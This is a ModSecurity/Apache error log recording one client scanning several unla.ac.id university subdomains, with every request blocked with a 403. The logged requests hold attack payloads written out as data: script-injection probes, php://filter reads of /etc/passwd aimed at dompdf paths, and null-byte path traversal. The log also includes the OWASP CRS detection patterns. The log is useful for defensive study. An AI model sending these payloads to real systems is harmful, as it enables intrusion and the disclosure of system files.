[Tue Aug 29 11:53:19.855620 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"/><script>alert(1)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22/><script>alert(1)</script>: \\x22/><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15v8Co-f0AAAfWOWQAAAAL"]
[Tue Aug 29 11:53:19.858201 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php"] [unique_id "ZO15v8Co-f0AAAoLfSEAAAAG"]
[Tue Aug 29 11:53:19.863302 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/PhpSpreadsheet/Writer/PDF/DomPDF.php"] [unique_id "ZO15v8Co-f0AAAni-DIAAAAU"]
[Tue Aug 29 11:53:19.927373 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/PhpSpreadsheet/Writer/PDF/DomPDF.php"] [unique_id "ZO15v8Co-f0AAAot8OcAAAAn"]
[Tue Aug 29 11:53:19.931191 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"/><script>alert(1)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22/><script>alert(1)</script>: \\x22/><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15v8Co-f0AAAowNnsAAAAH"]
[Tue Aug 29 11:53:19.940053 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php"] [unique_id "ZO15v8Co-f0AAAog@EIAAAAY"]
[Tue Aug 29 11:53:19.940823 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"/><script>alert(1)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22/><script>alert(1)</script>: \\x22/><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15v8Co-f0AAAoesNQAAAAV"]
[Tue Aug 29 11:53:19.941366 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/lib/dompdf/dompdf.php"] [unique_id "ZO15v8Co-f0AAAolKVgAAAAe"]
[Tue Aug 29 11:53:19.950523 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"/><script>alert(1)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22/><script>alert(1)</script>: \\x22/><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15v8Co-f0AAAot8OgAAAAn"]
[Tue Aug 29 11:53:19.951704 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/PhpSpreadsheet/Writer/PDF/DomPDF.php"] [unique_id "ZO15v8Co-f0AAAowNnwAAAAH"]
[Tue Aug 29 11:53:19.975500 2023] [:error] [pid 2610] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"/><script>alert(1)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22/><script>alert(1)</script>: \\x22/><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15v8Co-f0AAAoyGx0AAAAI"]
[Tue Aug 29 11:53:20.053417 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/lib/dompdf/dompdf.php"] [unique_id "ZO15wMCo-f0AAAowNn0AAAAH"]
[Tue Aug 29 11:53:20.167116 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/lib/dompdf/dompdf.php"] [unique_id "ZO15wMCo-f0AAAnTlcIAAAAA"]
[Tue Aug 29 11:53:20.553213 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/includes/dompdf/dompdf.php"] [unique_id "ZO15wMCo-f0AAAnTlcMAAAAA"]
[Tue Aug 29 11:53:20.561585 2023] [:error] [pid 2595] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/includes/dompdf/dompdf.php"] [unique_id "ZO15wMCo-f0AAAojaqUAAAAb"]
[Tue Aug 29 11:53:20.653731 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/lib/dompdf/dompdf.php"] [unique_id "ZO15wMCo-f0AAAot8OsAAAAn"]
[Tue Aug 29 11:53:20.660651 2023] [:error] [pid 2604] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/lib/dompdf/dompdf.php"] [unique_id "ZO15wMCo-f0AAAosCwwAAAAm"]
[Tue Aug 29 11:53:20.692939 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/includes/dompdf/dompdf.php"] [unique_id "ZO15wMCo-f0AAAni-DcAAAAU"]
[Tue Aug 29 11:53:21.558100 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/includes/dompdf/dompdf.php"] [unique_id "ZO15wcCo-f0AAAn4044AAAAW"]
[Tue Aug 29 11:53:21.641594 2023] [:error] [pid 2604] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "ZO15wcCo-f0AAAosCxIAAAAm"]
[Tue Aug 29 11:53:21.655406 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/includes/dompdf/dompdf.php"] [unique_id "ZO15wcCo-f0AAAowNoMAAAAH"]
[Tue Aug 29 11:53:21.667340 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "ZO15wcCo-f0AAAoAkzQAAAAC"]
[Tue Aug 29 11:53:21.685650 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "ZO15wcCo-f0AAAot8PMAAAAn"]
[Tue Aug 29 11:53:22.536683 2023] [:error] [pid 2604] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15wsCo-f0AAAosCxQAAAAm"]
[Tue Aug 29 11:53:22.550115 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15wsCo-f0AAAfWOWsAAAAL"]
[Tue Aug 29 11:53:22.550675 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15wsCo-f0AAAor7rcAAAAk"]
[Tue Aug 29 11:53:22.551395 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php"] [unique_id "ZO15wsCo-f0AAAoz700AAAAS"]
[Tue Aug 29 11:53:22.987037 2023] [:error] [pid 2612] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15wsCo-f0AAAo0gNMAAAAZ"]
[Tue Aug 29 11:53:23.080608 2023] [:error] [pid 2610] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "ZO15w8Co-f0AAAoyGygAAAAI"]
